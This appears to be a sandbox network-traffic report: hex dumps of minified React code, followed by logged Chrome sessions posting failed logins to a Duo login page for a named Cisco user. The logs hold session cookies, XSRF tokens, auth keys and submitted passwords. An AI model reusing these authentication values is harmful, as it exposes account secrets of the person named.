                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 7d 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 66 3d 65 2e 6e 65 78 74 2c 64 3d 64 2e 62 61 73 65 53 74 61 74 65 3b 76 61 72 20 68 3d 67 3d 6e 75 6c 6c 2c 6b 3d 6e 75 6c 6c 2c 6c 3d 66 3b 64 6f 7b 76 61 72 20 6e 3d 6c 2e 6c 61 6e 65 3b 69 66 28 28 4f 68 26 6e 29 3d 3d 3d 6e 29 6e 75 6c 6c 21 3d 3d 6b 26 26 28 6b 3d 6b 2e 6e 65 78 74 3d 7b 6c 61 6e 65 3a 30 2c 61 63 74 69 6f 6e 3a 6c 2e 61 63 74 69 6f 6e 2c 68 61 73 45 61 67 65 72 53 74 61 74 65 3a 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 2c 65 61 67 65 72 53 74 61 74 65 3a 6c 2e 65 61 67 65 72 53 74 61 74 65 2c 6e 65 78 74 3a 6e 75 6c 6c 7d 29 2c 64 3d 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 3f 6c 2e 65 61 67 65 72 53 74 61 74 65 3a 61 28 64 2c 6c 2e 61 63 74 69 6f 6e 29 3b 65 6c 73 65 7b 76 61 72 20
                                                                                                                                          Data Ascii: }if(null!==e){f=e.next,d=d.baseState;var h=g=null,k=null,l=f;do{var n=l.lane;if((Oh&n)===n)null!==k&&(k=k.next={lane:0,action:l.action,hasEagerState:l.hasEagerState,eagerState:l.eagerState,next:null}),d=l.hasEagerState?l.eagerState:a(d,l.action);else{var
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 68 69 6c 64 29 7b 63 2e 63 68 69 6c 64 5b 22 72 65 74 75 72 6e 22 5d 3d 63 2c 63 3d 63 2e 63 68 69 6c 64 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 63 3d 3d 3d 62 29 62 72 65 61 6b 3b 66 6f 72 28 3b 6e 75 6c 6c 3d 3d 3d 63 2e 73 69 62 6c 69 6e 67 3b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7c 7c 63 5b 22 72 65 74 75 72 6e 22 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 3b 63 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7d 63 2e 73 69 62 6c 69 6e 67 5b 22 72 65 74 75 72 6e 22 5d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 2c 63 3d 63 2e 73 69 62 6c 69 6e 67 7d 7d 2c 55 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 56 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 61 2e 6d 65 6d 6f 69 7a 65 64 50 72 6f 70 73 3b 69 66 28 65 21 3d
                                                                                                                                          Data Ascii: hild){c.child["return"]=c,c=c.child;continue}if(c===b)break;for(;null===c.sibling;){if(null===c["return"]||c["return"]===b)return;c=c["return"]}c.sibling["return"]=c["return"],c=c.sibling}},Ui=function(){},Vi=function(a,b,c,d){var e=a.memoizedProps;if(e!=
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 74 72 79 7b 4e 6a 28 35 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 69 66 28 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 2c 33 32 26 61 2e 66 6c 61 67 73 29 7b 76 61 72 20 65 3d 61 2e 73 74 61 74 65 4e 6f 64 65 3b 74 72 79 7b 6e 62 28 65 2c 22 22 29 7d 63 61 74 63 68 28
                                                                                                                                          Data Ascii: tch(m){U(a,a["return"],m)}try{Nj(5,a,a["return"])}catch(m){U(a,a["return"],m)}}break;case 1:ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]);break;case 5:if(ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]),32&a.flags){var e=a.stateNode;try{nb(e,"")}catch(
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 7d 7d 7d 76 61 72 20 6d 3d 66 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6d 29 7b 76 61 72 20 77 3d 6d 2e 63 68 69 6c 64 3b 69 66 28 6e 75 6c 6c 21 3d 3d 77 29 7b 6d 2e 63 68 69 6c 64 3d 6e 75 6c 6c 3b 64 6f 7b 76 61 72 20 4a 3d 77 2e 73 69 62 6c 69 6e 67 3b 77 2e 73 69 62 6c 69 6e 67 3d 6e 75 6c 6c 2c 77 3d 4a 7d 77 68 69 6c 65 28 6e 75 6c 6c 21 3d 3d 77 29 7d 7d 54 3d 66 7d 7d 69 66 28 30 21 3d 28 32 30 36 34 26 66 2e 73 75 62 74 72 65 65 46 6c 61 67 73 29 26 26 6e 75 6c 6c 21 3d 3d 67 29 67 5b 22 72 65 74 75 72 6e 22 5d 3d 66 2c 54 3d 67 3b 65 6c 73 65 20 62 3a 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 54 3b 29 7b 69 66 28 30 21 3d 28 32 30 34 38 26 28 66 3d 54 29 2e 66 6c 61 67 73 29 29 73 77 69 74 63 68 28 66 2e 74 61 67 29 7b 63 61 73
                                                                                                                                          Data Ascii: }}}var m=f.alternate;if(null!==m){var w=m.child;if(null!==w){m.child=null;do{var J=w.sibling;w.sibling=null,w=J}while(null!==w)}}T=f}}if(0!=(2064&f.subtreeFlags)&&null!==g)g["return"]=f,T=g;else b:for(;null!==T;){if(0!=(2048&(f=T).flags))switch(f.tag){cas
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 44 43 45 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 29 74 72 79 7b 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 63 68 65 63 6b 44 43 45 29 7d 63 61 74 63 68 28 65 72 72 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 72 72 29 7d 7d 28 29 2c 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73
                                                                                                                                          Data Ascii: e__){"use strict";!function checkDCE(){if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(err){console.error(err)}}(),module.exports
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 75 65 73 74 22 2c 22 e2 97 83 22 3a 22 6c 74 72 69 22 2c 22 e2 a6 96 22 3a 22 6c 74 72 50 61 72 22 2c 22 e2 a5 8a 22 3a 22 6c 75 72 64 73 68 61 72 22 2c 22 e2 a5 a6 22 3a 22 6c 75 72 75 68 61 72 22 2c 22 e2 89 a8 ef b8 80 22 3a 22 6c 76 6e 45 22 2c 22 c2 af 22 3a 22 6d 61 63 72 22 2c 22 e2 99 82 22 3a 22 6d 61 6c 65 22 2c 22 e2 9c a0 22 3a 22 6d 61 6c 74 22 2c 22 e2 a4 85 22 3a 22 4d 61 70 22 2c 22 e2 86 a6 22 3a 22 6d 61 70 22 2c 22 e2 86 a5 22 3a 22 6d 61 70 73 74 6f 75 70 22 2c 22 e2 96 ae 22 3a 22 6d 61 72 6b 65 72 22 2c 22 e2 a8 a9 22 3a 22 6d 63 6f 6d 6d 61 22 2c 22 d0 9c 22 3a 22 4d 63 79 22 2c 22 d0 bc 22 3a 22 6d 63 79 22 2c 22 e2 80 94 22 3a 22 6d 64 61 73 68 22 2c 22 e2 88 ba 22 3a 22 6d 44 44 6f 74 22 2c 22 e2 81 9f 22 3a 22 4d 65 64 69 75 6d
                                                                                                                                          Data Ascii: uest","":"ltri","":"ltrPar","":"lurdshar","":"luruhar","":"lvnE","":"macr","":"male","":"malt","":"Map","":"map","":"mapstoup","":"marker","":"mcomma","":"Mcy","":"mcy","":"mdash","":"mDDot","":"Medium


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          79192.168.2.165293835.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:37 UTC1150OUTPOST /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 147
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          content-type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://cisco.login.duosecurity.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:37 UTC147OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 70 65 74 65 72 2e 73 6d 69 74 68 25 34 30 63 69 73 63 6f 2e 63 6f 6d 26 70 61 73 73 77 6f 72 64 3d 66 77 72 65 72 65 77 26 70 61 73 73 77 6f 72 64 43 68 61 6e 67 65 52 65 71 75 65 73 74 65 64 3d 66 61 6c 73 65 26 61 75 74 68 6b 65 79 3d 41 53 57 33 58 4d 33 4c 4f 38 53 4c 43 37 35 4a 51 43 36 30 26 5f 78 73 72 66 3d 63 30 65 35 35 61 35 38 36 61 63 35 34 36 31 35 62 33 38 36 36 65 31 62 36 32 64 36 65 37 33 36
                                                                                                                                          Data Ascii: username=peter.smith%40cisco.com&password=fwrerew&passwordChangeRequested=false&authkey=ASW3XM3LO8SLC75JQC60&_xsrf=c0e55a586ac54615b3866e1b62d6e736
                                                                                                                                          2024-11-18 05:48:39 UTC508INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:39 GMT
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Content-Length: 364
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          2024-11-18 05:48:39 UTC364INData Raw: 7b 22 73 74 61 74 22 3a 20 22 46 41 49 4c 22 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 49 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 22 2c 20 22 61 75 74 68 6b 65 79 22 3a 20 22 41 53 37 42 42 53 4b 49 47 4e 36 5a 50 58 55 51 54 4e 32 44 22 2c 20 22 61 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 73 63 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 20 6e 75 6c 6c 2c 20 22 70 61 73 73 77 6f 72 64 5f 72 65 73 65 74 5f 6e 65 65 64 65 64 22 3a 20 66 61 6c 73 65 2c 20 22 70 61 73 73 77 6f 72 64 5f 63 68 61 6e 67 65 5f 72 65 71 75 65 73 74 65 64 22 3a
                                                                                                                                          Data Ascii: {"stat": "FAIL", "message": "Invalid credentials", "authkey": "AS7BBSKIGN6ZPXUQTN2D", "aid": "4873fe428ab243529767cba103466e46", "scid": "4873fe428ab243529767cba103466e46", "redirect_url": null, "password_reset_needed": false, "password_change_requested":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          80192.168.2.165293952.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:40 UTC762OUTGET /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:40 UTC170INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 1043
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          ETag: "672e588f-413"
                                                                                                                                          2024-11-18 05:48:40 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->...[if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->...[if gt IE 9]>...> <html lang="en"> ...<![endif]--> <head> <meta charset="utf-8"> <titl


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          81192.168.2.165294235.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:49 UTC1150OUTPOST /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 160
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          content-type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://cisco.login.duosecurity.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:49 UTC160OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 70 65 74 65 72 2e 73 6d 69 74 68 25 34 30 63 69 73 63 6f 2e 63 6f 6d 26 70 61 73 73 77 6f 72 64 3d 66 72 65 68 67 75 65 68 71 67 75 69 70 70 75 71 68 65 67 68 26 70 61 73 73 77 6f 72 64 43 68 61 6e 67 65 52 65 71 75 65 73 74 65 64 3d 66 61 6c 73 65 26 61 75 74 68 6b 65 79 3d 41 53 37 42 42 53 4b 49 47 4e 36 5a 50 58 55 51 54 4e 32 44 26 5f 78 73 72 66 3d 63 30 65 35 35 61 35 38 36 61 63 35 34 36 31 35 62 33 38 36 36 65 31 62 36 32 64 36 65 37 33 36
                                                                                                                                          Data Ascii: username=peter.smith%40cisco.com&password=frehguehqguippuqhegh&passwordChangeRequested=false&authkey=AS7BBSKIGN6ZPXUQTN2D&_xsrf=c0e55a586ac54615b3866e1b62d6e736
                                                                                                                                          2024-11-18 05:48:51 UTC508INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:51 GMT
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Content-Length: 364
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          2024-11-18 05:48:51 UTC364INData Raw: 7b 22 73 74 61 74 22 3a 20 22 46 41 49 4c 22 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 49 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 22 2c 20 22 61 75 74 68 6b 65 79 22 3a 20 22 41 53 4f 4d 44 50 46 48 5a 39 4c 57 4d 49 4f 4e 37 33 37 34 22 2c 20 22 61 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 73 63 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 20 6e 75 6c 6c 2c 20 22 70 61 73 73 77 6f 72 64 5f 72 65 73 65 74 5f 6e 65 65 64 65 64 22 3a 20 66 61 6c 73 65 2c 20 22 70 61 73 73 77 6f 72 64 5f 63 68 61 6e 67 65 5f 72 65 71 75 65 73 74 65 64 22 3a
                                                                                                                                          Data Ascii: {"stat": "FAIL", "message": "Invalid credentials", "authkey": "ASOMDPFHZ9LWMION7374", "aid": "4873fe428ab243529767cba103466e46", "scid": "4873fe428ab243529767cba103466e46", "redirect_url": null, "password_reset_needed": false, "password_change_requested":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          82192.168.2.165294352.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:52 UTC762OUTGET /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:52 UTC170INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 1043
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          ETag: "672e588f-413"
                                                                                                                                          2024-11-18 05:48:52 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->...[if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->...[if gt IE 9]>...> <html lang="en"> ...<![endif]--> <head> <meta charset="utf-8"> <titl


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          83192.168.2.165294435.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:57 UTC1150OUTPOST /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 160
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          content-type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://cisco.login.duosecurity.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:57 UTC160OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 70 65 74 65 72 2e 73 6d 69 74 68 25 34 30 63 69 73 63 6f 2e 63 6f 6d 26 70 61 73 73 77 6f 72 64 3d 66 72 65 68 67 75 65 68 71 67 75 69 70 70 75 71 68 65 67 68 26 70 61 73 73 77 6f 72 64 43 68 61 6e 67 65 52 65 71 75 65 73 74 65 64 3d 66 61 6c 73 65 26 61 75 74 68 6b 65 79 3d 41 53 4f 4d 44 50 46 48 5a 39 4c 57 4d 49 4f 4e 37 33 37 34 26 5f 78 73 72 66 3d 63 30 65 35 35 61 35 38 36 61 63 35 34 36 31 35 62 33 38 36 36 65 31 62 36 32 64 36 65 37 33 36
                                                                                                                                          Data Ascii: username=peter.smith%40cisco.com&password=frehguehqguippuqhegh&passwordChangeRequested=false&authkey=ASOMDPFHZ9LWMION7374&_xsrf=c0e55a586ac54615b3866e1b62d6e736
                                                                                                                                          2024-11-18 05:49:00 UTC508INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:00 GMT
